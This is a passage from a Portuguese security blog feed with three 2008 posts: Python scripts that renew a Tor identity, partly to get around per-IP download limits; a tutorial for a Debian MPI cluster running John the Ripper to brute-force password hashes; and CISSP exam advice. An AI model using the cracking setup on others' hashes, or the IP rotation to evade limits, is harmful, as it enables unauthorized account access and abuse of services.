<p>if check_proxy:</p>
<p>    print "[+] http_proxy detected: " + os.environ.get('http_proxy')</p>
<p> </p>
<p>print "[+] Trying get your external IP address.... "</p>
<p>try:</p>
<p>    conexao = urllib.urlopen('http://www.meuip.com.br')</p>
<p>    conteudo = conexao.read()</p>
<p>    er = re.compile(r"\d+\.\d+\.\d+\.\d")</p>
<p>    find_ip = er.findall(conteudo)</p>
<p>    print "[+] IP address FOUND: " + find_ip[0]</p>
<p>except:</p>
<p>    print "Connection fail."</p>
<p></code></p>
<p> </p>
<p><code>---------</code></p>
<p> </p>
<p>No script abaixo, criei para forçar um &#8220;renew identity&#8221; lançando informações direto dentro do socket do TOR que fica aguardando por requisições no <strong>localhost</strong> porta <strong>9051</strong>.</p>
<p> </p>
<p><code>$ cat renew-tor.py</code></p>
<p><code> </code></p>
<p><code>--------- </p>
<p>#!/usr/bin/python</p>
<p>import socket</p>
<p>host = "127.0.0.1"</p>
<p>port = 9051</p>
<p>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</p>
<p>s.connect((host, port))</p>
<p>s.send('AUTHENTICATE \"sua-super-senha-aqui\"\nsignal NEWNYM\n')</p>
<p>s.close()</p>
<p></code></p>
<p> </p>
<p><code>---------</code></p>
<p><em>* Sim, sim&#8230; guardar senhas em texto puro não faz bem pra saúde, mas não tive paciência em criar um esquema de cookie criptografado pra utilizar com o TOR. Quem fizer manda ae! :)</em></p>
<p> </p>
<p>Quem quiser tornar automático a renovação de IP basta executar o comando abaixo, que a cada 3 minutos seu IP do TOR será renovado. Isso é util pra quem usa aquelas p*** de serviço de download que limita por IP&#8230; e também pra mais uma série de outras infinidades né? ;P</p>
<p> </p>
<p><code>$ echo "3 * * * * /home/usuario/scripts/renew-tor.py" | crontab</code></p>
<p><em>* Não se esqueça de ajustar o caminho correto para o script!</em> </p>
<p> </p>
<p>Para quem se interessar em como interagir com o TOR enviando sinais diratamente no socket recomendo a leitura das <a href="http://www.torproject.org/svn/trunk/doc/spec/control-spec.txt">especificações</a> do mesmo.</p>
<p>Estes são meus primeiros scripts escritos em Python e espero ser útil para mais alguém. Convoco aqui os <strong>Masters Python Developers</strong> (meus mestres, <a href="http://blog.stiod.com/">Rafa</a> e <a href="http://osysadmin.blogspot.com/">Miguel</a> para dar pitacos e corrigir meus erros de programação).</p>
<p><strong>NOTA:</strong> Não me responsabilizo por qualquer reação que o Python venha causar no indivíduo que começar a programar de verdade nesta linguagem&#8230; há boatos que quem começa a programar em Python acaba virando preguiçoso uns até dizem que acaba emburrecendo e largando outras linguagens.  :-o  (<strong>eu amo C também e to pagando pra ver!</strong>)</p>
<p> </p>
<p>É isso ae&#8230; <strong>Enjoy!</strong></p>
Posted in Article Tagged: Development, Python, Security, Tor <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/111/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/111/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/111/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/111/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/111/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/111/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/111/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/111/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/111/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/111/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=111&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/10/17/eu-amo-python/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
		<item>
		<title>Quebrando tudo: HPC com Cluster Debian e John The Ripper</title>
		<link>http://ulissescastro.wordpress.com/2008/10/03/quebrando-tudo-hpc-com-cluster-debian-e-john-the-ripper/</link>
		<comments>http://ulissescastro.wordpress.com/2008/10/03/quebrando-tudo-hpc-com-cluster-debian-e-john-the-ripper/#comments</comments>
		<pubDate>Fri, 03 Oct 2008 15:35:56 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Article]]></category>
		<category><![CDATA[Cluster]]></category>
		<category><![CDATA[Debian]]></category>
		<category><![CDATA[Howto]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=90</guid>
		<description><![CDATA[Há bastante tempo venho estudando uma forma de aumentar a diversidade de formatos(hashs) suportados, e também a potência e velocidade das minhas auditorias locais em arquivos de senha utilizando força bruta.
O bom e velho John The Ripper (versão open source) em algumas situações deixa a desejar, pois os únicos formatos de hash que consegue testar [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=90&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Há bastante tempo venho estudando uma forma de aumentar a diversidade de formatos(<a href="http://en.wikipedia.org/wiki/Hash_function" target="_blank">hashs</a>) suportados, e também a potência e velocidade das minhas auditorias locais em arquivos de senha utilizando <a href="http://en.wikipedia.org/wiki/Brute_force_attack" target="_blank">força bruta</a>.</p>
<p>O bom e velho <a href="http://www.openwall.com/john/" target="_blank">John The Ripper</a> (versão open source) em algumas situações deixa a desejar, pois os únicos formatos de hash que consegue testar são DES/BSDI/MD5/BF/AFS/LM, em determinadas situações quando preciso avaliar senhas do MySQL, ORACLE, MSSQL, MD5(apache) por exemplo, acabava ficando sem alternativa.</p>
<p>Depois de algumas pesquisas e estudos no <a href="http://www.google.com" target="_blank">Oráculo</a>, vi que algumas pessoas também sentiram a mesma necessidade e criaram <a href="http://openwall.info/wiki/john/parallelization" target="_blank">projetos</a> que potencializam o John The Ripper, criaram patches para aumentar a diversidade de formatos suportados e também suporte à processamento paralelo. (<a href="http://en.wikipedia.org/wiki/High-performance_computing">HPC</a>)</p>
<p>Analisando o <a href="http://www.bindshell.net/tools/johntheripper">projeto</a> criado por Ryan Lim, que atualmente é atualizado e mantido por John Anderson traz excelentes possibilidades, dentre elas aumento do número de formatos(37) suportados pelo John e outro que traz suporte ao processamento paralelo utilizando bibliotecas <a href="http://en.wikipedia.org/wiki/Message_Passing_Interface" target="_blank">MPI</a>.</p>
<p>Abaixo demonstro como criar em poucos passos um cluster com Debian (Lenny) utilizando <a href="http://en.wikipedia.org/wiki/MPICH" target="_blank">MPICH2</a> para processamento paralelo e como instalar/utilizar o John The Ripper *BOMBADO* neste ambiente.</p>
<p>Para construção do lab utilizei dois desktops que tenho em casa, mas isso pode/deve ser ampliado para quantas máquinas você quiser/puder, quanto mais máquinas conseguir melhor, pois o processamento aumenta e por consequência a velocidade para quebrar uma senha em um teste de força bruta aumentará.</p>
<p>Para esclarescer rapidamente o que é um cluster recomendo a leitura rápida no <a href="http://en.wikipedia.org/wiki/Computer_clusters">wikipedia</a> e se quiser aprofundar pra valer no assunto sobre custer e processamento paralelo recomendo a leitura do <a href="http://www.docs.mussicorp.net/guiacluster/" target="_blank">Guia de Cluster</a> escrito pelo meu amigo <a href="http://diario.mussicorp.net/" target="_blank">Mussi</a> que é um excelente material e referência em português.</p>
<p><strong>CONSTRUINDO O CLUSTER</strong></p>
<p>Instale nas duas máquinas o Debian Lenny padrão, sem ambiente gráfico o ambiente deve ficar assim:</p>
<p><strong>DESKTOP 1</strong>:</p>
<p>IP: 192.168.1.100</p>
<p>NOME: <strong>master</strong></p>
<p><strong>DESKTOP 2</strong>:</p>
<p>IP: 192.168.1.101</p>
<p>NOME: <strong>node01</strong></p>
<p>Configure o arquivo <strong>/etc/hosts</strong> nas máquinas, os arquivos devem ficaram exatamente assim:</p>
<p><code>127.0.0.1 localhost<br />
#127.0.1.1 master.localdomain master<br />
192.168.1.100 master.localdomain master<br />
192.168.1.101 node01.localdomain node01</code></p>
<p><strong>ATENÇÃO:</strong> Na segunda linha comentei o endereço 127.0.1.1 para evitar problemas com o MPICH2, o mesmo deve ser feito em todos os nós.</p>
<p>Neste tutorial abordo uma forma rápida e prática de criar cluster em casa/laboratório com poucos computadores, se for utilizar muitas máquinas fica inviável editar <strong>/etc/hosts</strong> de cada uma, soluções utilizando <strong>BIND + DHCP</strong> podem ser vista no projeto <a href="http://debianclusters.cs.uni.edu/index.php/Main_Page">Debian Clusters</a>.</p>
<p>Adicione nas máquinas o usuário/grupo que será utilizado por todos os hosts, lembre-se que o usuário <strong>deve ter</strong> o mesmo <strong>uid</strong> e <strong>gid</strong> em <strong>todas as máquinas</strong>.</p>
<p><code># groupadd --gid 1100 mpigroup<br />
# adduser --home /cluster --uid 1100 --gid 1100 mpiuser</code></p>
<p>Como estou utilizando poucos computadores adicionar os usuários na mão não é problema, se for criar um cluster em diversas máquinas e também utilizado por diversos usuários recomendo que utilize um servidor de autenticação centralizado (OpenLDAP), no projeto <a href="http://debianclusters.cs.uni.edu/index.php/Main_Page">Debian Clusters</a> você encontra tutoriais de como fazer.</p>
<p>No MASTER instale pacotes necessários:</p>
<p><code>master:~# aptitude install nfs-kernel-server</code></p>
<p>Compartilhe o diretório <strong>/cluster</strong> para toda rede. Não vou abordar métodos de hardening. O ambiente que estou criando está em uma &#8220;rede confiável&#8221;, neste caso minha lan dentro de casa.</p>
<p><code>master:~# echo "/cluster *(rw,sync,no_subtree_check)" &gt;&gt; /etc/exports</code></p>
<p>Reinicie o servico:</p>
<p><code>master:~# invoke-rc.d nfs-kernel-server restart</code></p>
<p>Será construído todo o ambiente do cluster/JtR dentro deste diretório, que ficará disponível para qualquer NÓ montá-lo.</p>
<p>Monte o diretório <strong>/cluster</strong> em TODOS os NÓS da rede:</p>
<p><code># mount master:/cluster /cluster</code></p>
<p>Caso queira, acrescente no <strong>/etc/fstab</strong> a entrada abaixo nos NÓS para montararem automaticamente a cada boot:</p>
<p><code>master:/custer /cluster nfs defaults 0 0</code></p>
<p>Em todas as máquinas instale e prepare o <strong>SSH</strong> com <strong>chaves trocadas</strong> para acesso <strong>sem senha</strong> entre o MASTER e os NÓS:</p>
<p><code># aptitude install openssh-server</code></p>
<p>No MASTER, com o usuário <strong>mpiuser</strong> crie a chave e acicione-a no authorized_keys:</p>
<p><code>master:~# su - mpiuser</code></p>
<p>Gere a chave, <strong>deixe a passphrase em branco</strong> (ENTER):</p>
<p><code>mpiuser@master:~$ ssh-keygen -t dsa</code></p>
<p>Adicione a chave gerada ao arquivo authorized_keys:</p>
<p><code>mpiuser@master:~$ cd .ssh<br />
mpiuser@master:~/.ssh$ cat id_dsa.pub &gt;&gt; authorized_keys</code></p>
<p>Assim não será necessário executar este comando em todos os NÓS, pois os mesmos irão montar o diretório /cluster.<br />
Para testar, execute algum comando via ssh no NÓ remoto e verifique se a senha será solicitada:</p>
<p><code>mpiuser@master:~$ ssh node01 hostname</code></p>
<p>NÓ configurado, MASTER configurado agora é preciso instalar o <strong>MPICH2</strong>.</p>
<p><strong>INSTALAÇÃO MPICH2</strong></p>
<p>Instale dependências necessárias para compilação:</p>
<p><code>master:~# aptidude install build-essential</code></p>
<p>MPICH2 da suporte a diversos outros tipos de compiladores e S.O.&#8217;s, para maiores informações consulte o <a href="http://www.mcs.anl.gov/research/projects/mpich2/index.php" target="_blank">site do projeto</a>.</p>
<p>Baixe o source do MPICH2, que na data da criação deste documento a versão estável é a <strong>1.0.7</strong>, descompacte, configure, compile e instale:</p>
<p><code>mpiuser@master:~$ mkdir src<br />
mpiuser@master:~$ mkdir mpich2<br />
mpiuser@master:~$ cd src<br />
mpiuser@master:~/src$ wget http://www.mcs.anl.gov/research/projects/mpich2/downloads/tarballs/1.0.7/mpich2-1.0.7.tar.gz<br />
mpiuser@master:~/src$ tar xvzf mpich2-1.0.7.tar.gz<br />
mpiuser@master:~/src$ cd mpich2-1.0.7<br />
mpiuser@master:~/src$ ./configure --prefix=/cluster/mpich2<br />
mpiuser@master:~/src$ make<br />
mpiuser@master:~/src$ make install</code></p>
<p>Acrescente ao <strong>/cluster/.bashrc</strong> um PATH com o caminho para os binários/bibliotecas do MPICH2:</p>
<p><code>mpiuser@master:~$ echo "export PATH=/cluster/mpich2/bin:$PATH" &gt;&gt; ~/.bashrc</code></p>
<p>mpiuser@master:~$ echo &#8220;LD_LIBRARY_PATH=/cluster/mpich2/lib:$LD_LIBRARY_PATH&#8221; &gt;&gt; ~/.bashrc</p>
<p>mpiuser@master:~$ echo &#8220;export PATH LD_LIBRARY_PATH&#8221; &gt;&gt; ~/.bashrc</p>
<p>Recarregue o .bashrc e verifique se os seguintes utilitários estão disponíveis na PATH.</p>
<p><code>mpiuser@master:~$ source ~/.bashrc<br />
mpiuser@master:~$ which mpiexec mpdboot</code></p>
<p>É preciso configurar o <strong>mpd</strong>, que é o principal serviço do cluster. Para isto <strong>crie</strong> no home do usuário <strong>mpiuser</strong> o arquivo <strong>/cluster/mpd.hosts</strong> e <strong>acrestente todas as máquinas envolvidas no cluster</strong>:</p>
<p><code>mpiuser@master:~$ vi /cluster/mpd.hosts<br />
node01<br />
master</code></p>
<p>Um requisito para execução do mpd é ter o arquivo de configuração com senha para sua comunicação:</p>
<p><code>mpiuser@master:~$ echo "secretword=SENHAFORTE" &gt;&gt; ~/.mpd.conf</code></p>
<p>Defina permissão para o arquivo:</p>
<p><code>mpiuser@master:~$ chmod 600 .mpd.conf</code></p>
<p>E finalmente teste-o, inicie o serviço:</p>
<p><code>mpiuser@master:~$ mpdboot -n 2 -f ~/mpd.hosts</code></p>
<p>Fraça um &#8220;trace&#8221; e verifique se os NÓS respondem:</p>
<p><code>mpiuser@master:~$ mpdtrace -l</code></p>
<p>Deve aparecer a mesma lista de servidores que adicionou no arquivo <strong>~/mpd.hosts</strong><br />
Pare o cluster:</p>
<p><code>mpiuser@master:~$ mpdallexit</code></p>
<p>Com o cluster configurado e testado vamos a instalação, configuração e uso do John.</p>
<p><strong>INSTALAÇÃO JOHN THE RIPPER COM SUPORTE MPI</strong></p>
<p>No MASTER, instale algumas dependências:</p>
<p><code>master:~# aptitude install libssl-dev openssl</code></p>
<p>Baixe o fonte com os patches aplicados do site do John Anderson:</p>
<p><code>mpiuser@master:~$ wget http://www.bindshell.net/tools/johntheripper/john-1.7.3.1-all-2-mpi8.tar.gz</code></p>
<p>Descompacte:</p>
<p><code>mpiuser@master:~$ tar xvzf john-1.7.3.1-all-2-mpi8.tar.gz<br />
mpiuser@master:~$ cd john-1.7.3.1-all-2-mpi8/src</code></p>
<p>Compile e instale, para isto, no diretório src execute o comando <strong>make</strong> e aparecerá uma <strong>lista</strong> com arquiteturas para compilar. No meu caso utilizei a opção <strong>linux-x86-any</strong>.</p>
<p><code>mpiuser@master:~/john-1.7.3.1-all-2-mpi8/src$ make linux-x86-any</code></p>
<p>Terminado a compilação os binários estarão no diretório <strong>~/john-1.7.3.1-all-2-mpi8/run</strong></p>
<p>Agora com o cluster configurado e o John instalado vamos para parte legal. :-)</p>
<p><strong>TESTANDO O AMBIENTE (PoC)</strong></p>
<p>Inicie o cluster:</p>
<p><code>mpiuser@master:~$ mpdboot -n 2 -f /cluster/mpd.hosts</code></p>
<p>O comando acima inicia o cluster com algumas opções:<br />
<strong>-n 2</strong> &#8211; quantidade de nós que vão iniciar<br />
<strong>-f</strong> &#8211; aponta para lista de nós à serem incluidos<br />
Só para <strong>confirmar</strong> faça um &#8220;trace&#8221; e veja se todos os NÓS estão funcionando:</p>
<p><code>mpiuser@master:~$ mpdtrace -l</code></p>
<p>E finalmente execute o <strong>benchmark</strong>, para perceber a <strong>diferença</strong> execute o John <strong>sem utilizar o cluster</strong>:</p>
<p><code>$ cd /cluster/john-1.7.3.1-all-2-mpi8/run<br />
$ ./john --test --format=DES</code></p>
<p><code>Benchmarking: Traditional DES [24/32 4K]... DONE<br />
Many salts: <strong>202415</strong> c/s real, 224417 c/s virtual<br />
Only one salt: <strong>194281</strong> c/s real, 215630 c/s virtual</code></p>
<p>Agora utilizando todos os NÓS e processadores:</p>
<p><code>$ mpiexec -m -n 4 ./john --test --format=DES</code></p>
<p><code>Benchmarking: Traditional DES [24/32 4K]... DONE<br />
Many salts: <strong>807070</strong> c/s real, 868429 c/s virtual<br />
Only one salt: <strong>779285</strong> c/s real, 849099 c/s virtual</code></p>
<p>Deu para perceber a <strong>DiFerEnçA</strong>? ;-)</p>
<p>Para entender os parâmetros:<br />
<strong>-m</strong> &#8211; suprime o stdout dos outros nós<br />
<strong>-n 4</strong> &#8211; numero de processadores que vou utilizar no meu caso 4 (ver logo abaixo)</p>
<p>Caso queira fazer um benchmark completo com todas as <strong>37 hashs possíveis</strong>&#8230; DES, BSDI, MD5, BF, AFS, LM, NT, XSHA, PO, raw-MD5, IPB2, raw-sha1, md5a, hmac-md5, KRB5, bfegg, nsldap, ssha, oracle, MYSQL, mysql-sha1, mscash, lotus5, DOMINOSEC, NETLM, NETNTLM, NETLMv2, NETHALFLM, mssql, mssql05, epi, phps, mysql-fast, pix-md5, sapG, sapB, md5ns</p>
<p><code>mpiuser@master:~/tools/john-1.7.3.1-all-2-mpi8/run$ ./john --test</code></p>
<p><strong>ou</strong> utilizando o cluster:</p>
<p><code>mpiuser@master:~/tools/john-1.7.3.1-all-2-mpi8/run$ mpiexec -m -n 4 ./john --test</code></p>
<p><strong>ATENÇÃO:</strong> Os benchmarks acima apresentados foram executados com os seguintes processadores:</p>
<p><strong>DESKTOP 1</strong> (master):</p>
<pre><code>mpiuser@master:~$ cat /proc/cpuinfo
processor       : 0
vendor_id       : GenuineIntel
cpu family      : 6
model           : 15
model name      : Intel(R) Core(TM)2 Duo CPU     E6750  @ 2.66GHz
stepping        : 11
cpu MHz         : 2666.714
cache size      : 4096 KB

processor       : 1
vendor_id       : GenuineIntel
cpu family      : 6
model           : 15
model name      : Intel(R) Core(TM)2 Duo CPU     E6750  @ 2.66GHz
stepping        : 11
cpu MHz         : 2666.714
cache size      : 4096 KB</code></pre>
<p><strong>DESKTOP 2</strong> (node01):</p>
<pre><code>mpiuser@node01:~$ cat /proc/cpuinfo
processor       : 0
vendor_id       : GenuineIntel
cpu family      : 6
model           : 15
model name      : Intel(R) Core(TM)2 CPU         T7200  @ 2.00GHz
stepping        : 6
cpu MHz         : 1995.239
cache size      : 4096 KB

processor       : 1
vendor_id       : GenuineIntel
cpu family      : 6
model           : 15
model name      : Intel(R) Core(TM)2 CPU         T7200  @ 2.00GHz
stepping        : 6
cpu MHz         : 1995.239
cache size      : 4096 KB</code></pre>
<p>Recomendo fazer os testes com um terminal aberto visualizando os processadores com o famoso <strong>top</strong> ou no modo gráfico com o <strong>gnome-system-monitor</strong> para maiores emoções. ;P</p>
<p>Utilizando cluster é possível ampliar os recursos utilizados por uma determnada aplicação, neste tutorial utilizei o John pois meu objetivo era específico, poderia ser qualquer outro tipo de aplicação que estivesse preparada para utilizar as bibliotecas MPI.</p>
<p>Importante frisar que não existe somente o MPICH2 de opção para processamento paralelo, alguns outros projetos e suas diferenças você encontra <a href="http://debianclusters.cs.uni.edu/index.php/MPICH:_Parallel_Programming" target="_blank">aqui</a>.</p>
<p>Conforme demonstrado, após a criação do MASTER, para adicionar NÓS ao cluster é muito simples, pode ser feito inclusive com o uso de um Live CD, bastando inicializar a máquina, adicionar o usuario mpiuser (não esqueça do uid/gid), montar o diretório nfs (/cluster), adicionar os nomes no /etc/hosts e ir pro abraço! :)</p>
<p>Quem criar um cluster em casa/laboratório/trabalho se possível postem seus resultados aqui no blog, quantidade de máquinas, processadores, benchmarks, etc&#8230;</p>
<p>Enjoy! ;)</p>
<p>REFERÊNCIAS</p>
<p><a href="http://wiki.lazarus.freepascal.org/MPICH" target="_blank">http://wiki.lazarus.freepascal.org/MPICH</a></p>
<p><a href="http://wiki.lazarus.freepascal.org/MPICH" target="_blank">https://wiki.ubuntu.com/MpichCluster</a></p>
<p><a href="http://www.mcs.anl.gov/research/projects/mpich2/documentation/index.php?s=docs" target="_blank">http://www.mcs.anl.gov/research/projects/mpich2/documentation/index.php?s=docs</a></p>
<p><a href="http://pt.wikipedia.org/wiki/Sistema_de_processamento_distribuido" target="_blank">http://pt.wikipedia.org/wiki/Sistema_de_processamento_distribuído</a></p>
Posted in Article Tagged: Cluster, Debian, Howto, Security <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/90/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/90/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/90/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/90/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/90/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=90&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/10/03/quebrando-tudo-hpc-com-cluster-debian-e-john-the-ripper/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
		<item>
		<title>Informações CISSP</title>
		<link>http://ulissescastro.wordpress.com/2008/09/26/informacoes-cissp/</link>
		<comments>http://ulissescastro.wordpress.com/2008/09/26/informacoes-cissp/#comments</comments>
		<pubDate>Fri, 26 Sep 2008 04:09:53 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Announce]]></category>
		<category><![CDATA[Certification]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=81</guid>
		<description><![CDATA[Após trocar algumas mensagens e e-mails com Marcelo Ferreira neste post e que as informações que ele comentou considero importantes para quem deseja estudar ou está estudando(como eu) para certificação CISSP, resolvi replicar seu comentário em forma de post. :)
Então tá ae na íntegra:
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;
Então com relação ao CISSP, é o seguinte:
Entra no site do isc2.org concorda com [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=81&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Após trocar algumas mensagens e e-mails com <a href="http://www.mundowifi.com.br/">Marcelo Ferreira</a> neste <a href="http://ulissescastro.wordpress.com/2008/05/26/passei-ceh-certified-ethical-hacker/">post</a> e que as informações que ele comentou considero importantes para quem deseja estudar ou está estudando(como eu) para certificação CISSP, resolvi replicar seu comentário em forma de post. :)</p>
<p>Então tá ae na íntegra:</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>Então com relação ao CISSP, é o seguinte:</p>
<p>Entra no site do isc2.org concorda com o código de ética dos caras. Escolhe o local do curso, acho que no brasil a módulo e a etek que estão aplicando esta prova (não direito pq a minha eu não fiz no brasil). Na época o valor da prova era 499 dólares (uma facada). Paga esse valor, dai os caras vão te dar uma numeração que vc vai ter que apresentar no dia da prova. Esta prova não é pelo computador é um puta cadernão parecendo aqueles de 200 folhas :-) afinal são 250 questões e 6 horas de prova que da pra virar o zoinho no final :-). Leva comida no dia e uns chocolates pq da uma fome animal e vc sai de lá meio zureta. Quanto ao método de estudo, o mais ninja que conheço é aquele que vc se interna durante alguns dias só respirando e comendo o material, esquece namorada, esposa, amigos ou seja lá o que for, pois é muita coisa pra estudar. O que eu li basicamente e que é o melhor livro na minha opinião é o da shon harris (deve estar na tereceira ou quarta edição agora) e depois o livro CISSP Passport. Esses são os principais depois vem os complementos entre videos, simulados, etc. Estes você vai encontrar neste site <a href="http://www.sadikhov.com/forum/index.php?act=Search&amp;CODE=show&amp;searchid=53823428046c50f105a148fa03eb41bb&amp;search_in=posts&amp;result_type=topics&amp;highlite=cissp">aqui</a>.</p>
<p>O score mínimo é 70% ou 700 pontos e vc só fica sabendo sua pontuação se tomar bomba, se passar eles não divulgam seu score justamente pra não ter esse lance de eu passei com 900 ou eu passei com 701, evitando assim que um fale que é melhor que o outro só pq atingiu mais pontos. Uma vez que passou você pode dar glórias pois é uma prova difícil e bem cansativa além de ser um furo no zóio de cara.</p>
<p>Depois de ter passado na prova a coisa não para por ai, vc só vai receber seu certificado após comprovar 4 anos de experiência em um dos 10 domínios do material que eles apresentam, mandando seu CV mais uma carta da empresa que trabalha ou trabalhou, para comprovar, ou então ser endossado por outro CISSP. Basicamente é isso. Quando chegar seu certificado vai se sentir como se estivesse concluído um curso na NASA :) mas não se preocupe pois isso logo vai passar quando chegar no seu trabalho e ver que ninguém da a mínima pra isso :-) e nem sequer entende o que isso significa :-)</p>
<p>Do ponto de vista satisfação pessoal, será muito bom pois vai verificar mais um desafio cumprido na sua vida. Se quiser encarar depois disso um Cisco CCIE e passar vc se sentirá o próprio Jedi ou mestre dos magos na área de informática pois tendo um CEH, um CISSP e um CCIE meu amigo ninguém poderá falar que não entende de informática, segurança, TCP/IP ou qualquer acrônimo do gênero. Até o Mitinick vai te respeitar :-)</p>
<p>Brincadeiras a parte, desejo boa sorte pra ti e se quiser trocar figurinhas sabe onde me <a href="http://www.mundowifi.com.br/">encontrar</a>.</p>
<p>Obrigado pela oportunidade de escrever no seu blog e pelas dicas para prova do CEH. Assim que fizer a prova volto com mais notícias :-)</p>
<p>Um abraço e fiquem com Deus todos vocês,</p>
<p>Marcelo Ferreira</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>Marcelão, valeu pela contribuição!</p>
<p>Já deu uma luz aqui pra mim e com certeza vai esclarecer para mais pessoas&#8230;.</p>
<p>Abaixo a melhor parte, ou seria a pior?  :-)  /  :-(</p>
<p>&#8220;(&#8230;)<em> Quando chegar seu certificado vai se sentir como se estivesse concluído um curso na NASA :) mas não se preocupe pois isso logo vai passar quando chegar no seu trabalho e ver que ninguém da a mínima pra isso :-) e nem sequer entende o que isso significa :-) (&#8230;)</em>&#8220;</p>
<p>Paradoxo perfeito: <strong>Alegria</strong> por ter alcançado um objetivo contra <strong>tristeza</strong> da ignorância das pessoas por nem sequer terem noção do que é a tal da certificação. Todos que já tiraram algum tipo de certificação com certeza já passou por isso.</p>
<p>É interessante conhecer o ponto de vista que cada um tem em relação à certificações, uns por modismo, outros por desafio, outros por pura pressão do chefe/mercado, de qualquer forma já me expressei um pouco sobre o que acho de certificações neste <a href="http://ulissescastro.wordpress.com/2008/09/10/certified-ethical-hacker-ceh/">post</a> e não vou ficar sendo redundante e escrevendo aqui as mesmas coisas. :)</p>
<p>[s] e valeu!</p>
 Tagged: Announce, Certification, Security <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/81/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/81/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/81/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/81/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/81/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=81&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
